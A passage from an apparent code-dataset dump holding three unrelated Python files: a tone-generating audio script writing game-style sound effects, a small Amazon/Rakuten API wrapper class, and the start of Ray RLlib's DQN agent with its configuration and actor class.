adsr(v(f=840.,fv=0.,nu=0.,d=.1, tab=D_i),S=-3.,R=10.),
adsr(v(f=840.*(2**(-6./12)),fv=0.,nu=0.,d=.1,tab=D_i),S=-3.,R=10.),
))))
w.write('ganho.wav', f_a, N(H((
adsr(v(f=840.*(2**(-7./12)),fv=0.,nu=0.,d=.1,tab=D_i),S=-3.,R=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.1, tab=D_i),S=-3.,R=10.),
))))
w.write('ganho2.wav', f_a, N(H((
adsr(v(f=840.,fv=0.,nu=0.,d=.075, tab=D_i),S=-3.,R=10.,A=5.,D=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.025, tab=D_i),S=-3.,R=10.,A=5.,D=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.05, tab=D_i),S=-3.,R=10.,A=5.,D=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.05, tab=D_i),S=-3.,R=5.,A=5.,D=10.),
))))
w.write('ganho3.wav', f_a, N(H((
adsr(v(f=240.,fv=0.,nu=0.,d=.75, tab=D_i),S=-9.,R=10.,A=5.,D=610.),
adsr(v(f=240.*(2.**(-7/12.)),fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=210.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0.,d=.5, tab=D_i), S=-9.,R=10.,A=5., D=410.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0.,d=.5, tab=D_i), S=-9.,R=5.,A=5., D=410.),
))))
w.write('ganho4.wav', f_a, N(H((
adsr(v(f=240.,fv=0.,nu=0.,d=.175, tab=D_i),S=-9.,R=10.,A=5.,D=60.),
adsr(v(f=240.*(2.**(-7/12.)),fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=210.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('ganho5.wav', f_a, N(H((
adsr(v(f=240.,fv=0.,nu=0.,d=.175, tab=D_i),S=-9.,R=10.,A=5.,D=60.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=210.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('ganho6.wav', f_a, N(H((
adsr(v(f=240.,fv=0.,nu=0.,d=.175, tab=D_i),S=-9.,R=10.,A=5.,D=60.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=210.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(12./12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('perda2.wav', f_a, N(H((
adsr(v(f=240.,fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=60.)+
adsr(v(f=240.*(2.**(6/12.)),fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=210.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=10.,A=5., D=40.)+
adsr(v(f=240.*(2.**(3./12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('perda3.wav', f_a, N(H((
adsr(v(f=240.,fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=60.)+
adsr(v(f=240.*(2.**(6/12.)),fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=210.),
))))
w.write('perda4.wav', f_a, N(H((
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=10.,A=5., D=40.)+
adsr(v(f=240.*(2.**(3./12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('perda5.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=10.,A=5., D=40.)+
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('ganhoX.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=D_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('ganhoX2.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6./12.)),fv=0.,nu=0.,d=.065, tab=D_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('ganhoX3.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6/12.)),fv=0. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1/12.)),fv=0. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6./12.)),fv=0. ,nu=10.,d=.065, tab=D_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0. ,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('perdaX4.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)) , fv=100. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=100.,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6/12.)), fv=100. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)) , fv=100. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1/12.)), fv=100. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=100.,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6./12.)), fv=100. ,nu=10.,d=.065, tab=D_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)), fv=100. ,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('perdaX5.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)) , fv=200. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=200.,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6/12.)), fv=200. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)) , fv=200. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1/12.)), fv=200. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=200.,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6./12.)), fv=200. ,nu=10.,d=.065, tab=D_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)), fv=200. ,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('videogame.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.65, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11/12.)),fv=0.,nu=0., d=.65, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.65, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1./12.)),fv=0.,nu=0.,d=.65, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.5, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(14/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(16/12.)),fv=0.,nu=0., d=.5, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(17./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(19./12.)),fv=0.,nu=0.,d=.65, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('videogame2.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4./12.)),fv=0.,nu=0.,d=.0652*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1./12.)),fv=0.,nu=0.,d=.065*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(14/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(16/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(17./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(19./12.)),fv=0.,nu=0.,d=.065*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('videogame3.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4./12.)),fv=0.,nu=0.,d=.0652*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065*3, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065*3, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1./12.)),fv=0.,nu=0.,d=.065*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065*3, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(14/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(16/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(17./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(19./12.)),fv=0.,nu=0.,d=.065*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('videogame4.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4./12.)),fv=0.,nu=0.,d=.0652*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065*3, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065*5, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065*3, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(2./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1./12.)),fv=0.,nu=0.,d=.065*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065*3, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(14/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(16/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(17./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(19./12.)),fv=0.,nu=0.,d=.065*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
))))
# abre todos os gritoFala*
# passa por um passa bandas que soh passa uns medios
# salva como tv_gritoFala*
#
#c = n.zeros(len(coefs))
#c[1000:10000] = n.exp(1j*n.random.uniform(0, 2*n.pi, 9000))
#
## real par, imaginaria impar
#c[Lambda/2+1:] = n.real(c[1:Lambda/2])[::-1] - 1j * \
# n.imag(c[1:Lambda/2])[::-1]
#
#resp_imp= n.fft.ifft(c)
#resp_imp_= n.real(resp_imp)
#import os
#
#ll=os.listdir(".")
#ll=[lll for lll in ll if "gritoFala" in lll]
#for i in ll:
# print i
# foo=n.convolve(w.read("%s"%(i,))[1],resp_imp)
# w.write('tv_%s'%(i,), f_a, N(foo))
# print i
#
| unlicense | 4,547,374,845,288,080,000 | 45.390826 | 216 | 0.425859 | false |
AkihikoITOH/capybara | capybara/capybara.py | 1 | 1091 | #!/bin/python
# -*- coding: utf-8 -*-
import os
from amazon_wrapper import AmazonWrapper
from rakuten_wrapper import RakutenWrapper
class Capybara:
def __init__(self, config_dir=None, tokens_dir=None):
self.wrappers = {}
self.wrappers['amazon'] = AmazonWrapper()
self.wrappers['rakuten'] = RakutenWrapper()
for service, wrapper in self.wrappers.items():
config_filename = './%s_config.json' % service
tokens_filename = './%s_tokens.tsv' % service
config_path = os.path.normpath(os.path.join(os.getcwd(), config_dir, config_filename))
tokens_path = os.path.normpath(os.path.join(os.getcwd(), tokens_dir, tokens_filename))
wrapper.setup(config_path, tokens_path)
def get(self, service=None, item=None):
return self.wrappers[service].access_wrapper({'item': item})
def isAvailable(self, service=None):
if service is None:
return False
try:
if self.wrappers[service]:
return True
except:
return False
| mit | -303,462,010,463,526,900 | 33.09375 | 98 | 0.613199 | false |
Wapaul1/ray | python/ray/rllib/dqn/dqn.py | 1 | 14408 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import numpy as np
import pickle
import os
import tensorflow as tf
import ray
from ray.rllib.common import Agent, TrainingResult
from ray.rllib.dqn import logger, models
from ray.rllib.dqn.common.wrappers import wrap_dqn
from ray.rllib.dqn.common.schedules import LinearSchedule
from ray.rllib.dqn.replay_buffer import ReplayBuffer, PrioritizedReplayBuffer
"""The default configuration dict for the DQN algorithm.
dueling: bool
whether to use dueling dqn
double_q: bool
whether to use double dqn
hiddens: array<int>
hidden layer sizes of the state and action value networks
model: dict
config options to pass to the model constructor
lr: float
learning rate for adam optimizer
schedule_max_timesteps: int
max num timesteps for annealing schedules
timesteps_per_iteration: int
number of env steps to optimize for before returning
buffer_size: int
size of the replay buffer
exploration_fraction: float
fraction of entire training period over which the exploration rate is
annealed
exploration_final_eps: float
final value of random action probability
sample_batch_size: int
update the replay buffer with this many samples at once
num_workers: int
the number of workers to use for parallel batch sample collection
train_batch_size: int
size of a batched sampled from replay buffer for training
print_freq: int
how often to print out training progress
set to None to disable printing
learning_starts: int
how many steps of the model to collect transitions for before learning
starts
gamma: float
discount factor
grad_norm_clipping: int or None
if not None, clip gradients during optimization at this value
target_network_update_freq: int
update the target network every `target_network_update_freq` steps.
prioritized_replay: True
if True prioritized replay buffer will be used.
prioritized_replay_alpha: float
alpha parameter for prioritized replay buffer
prioritized_replay_beta0: float
initial value of beta for prioritized replay buffer
prioritized_replay_beta_iters: int
number of iterations over which beta will be annealed from initial
value to 1.0. If set to None equals to schedule_max_timesteps
prioritized_replay_eps: float
epsilon to add to the TD errors when updating priorities.
num_cpu: int
number of cpus to use for training
"""
DEFAULT_CONFIG = dict(
dueling=True,
double_q=True,
hiddens=[256],
model={},
gpu_offset=0,
lr=5e-4,
schedule_max_timesteps=100000,
timesteps_per_iteration=1000,
buffer_size=50000,
exploration_fraction=0.1,
exploration_final_eps=0.02,
sample_batch_size=1,
num_workers=1,
train_batch_size=32,
print_freq=1,
learning_starts=1000,
gamma=1.0,
grad_norm_clipping=10,
target_network_update_freq=500,
prioritized_replay=False,
prioritized_replay_alpha=0.6,
prioritized_replay_beta0=0.4,
prioritized_replay_beta_iters=None,
prioritized_replay_eps=1e-6,
num_cpu=16)
class Actor(object):
def __init__(self, env_creator, config, logdir):
env = env_creator()
env = wrap_dqn(env, config["model"])
self.env = env
self.config = config
num_cpu = config["num_cpu"]
tf_config = tf.ConfigProto(
inter_op_parallelism_threads=num_cpu,
intra_op_parallelism_threads=num_cpu)
self.sess = tf.Session(config=tf_config)
self.dqn_graph = models.DQNGraph(env, config)
# Create the replay buffer
if config["prioritized_replay"]:
self.replay_buffer = PrioritizedReplayBuffer(
config["buffer_size"],
alpha=config["prioritized_replay_alpha"])
prioritized_replay_beta_iters = \
config["prioritized_replay_beta_iters"]
if prioritized_replay_beta_iters is None:
prioritized_replay_beta_iters = \
config["schedule_max_timesteps"]
self.beta_schedule = LinearSchedule(
prioritized_replay_beta_iters,
initial_p=config["prioritized_replay_beta0"],
final_p=1.0)
else:
self.replay_buffer = ReplayBuffer(config["buffer_size"])
self.beta_schedule = None
# Create the schedule for exploration starting from 1.
self.exploration = LinearSchedule(
schedule_timesteps=int(
config["exploration_fraction"] *
config["schedule_max_timesteps"]),
initial_p=1.0,
final_p=config["exploration_final_eps"])
# Initialize the parameters and copy them to the target network.
self.sess.run(tf.global_variables_initializer())
self.dqn_graph.update_target(self.sess)
self.variables = ray.experimental.TensorFlowVariables(
tf.group(self.dqn_graph.q_tp1, self.dqn_graph.q_t), self.sess)
self.episode_rewards = [0.0]
self.episode_lengths = [0.0]
self.saved_mean_reward = None
self.obs = self.env.reset()
self.file_writer = tf.summary.FileWriter(logdir, self.sess.graph)
def step(self, cur_timestep):
# Take action and update exploration to the newest value
action = self.dqn_graph.act(
self.sess, np.array(self.obs)[None],
self.exploration.value(cur_timestep))[0]
new_obs, rew, done, _ = self.env.step(action)
ret = (self.obs, action, rew, new_obs, float(done))
self.obs = new_obs
self.episode_rewards[-1] += rew
self.episode_lengths[-1] += 1
if done:
self.obs = self.env.reset()
self.episode_rewards.append(0.0)
self.episode_lengths.append(0.0)
return ret
def do_steps(self, num_steps, cur_timestep):
for _ in range(num_steps):
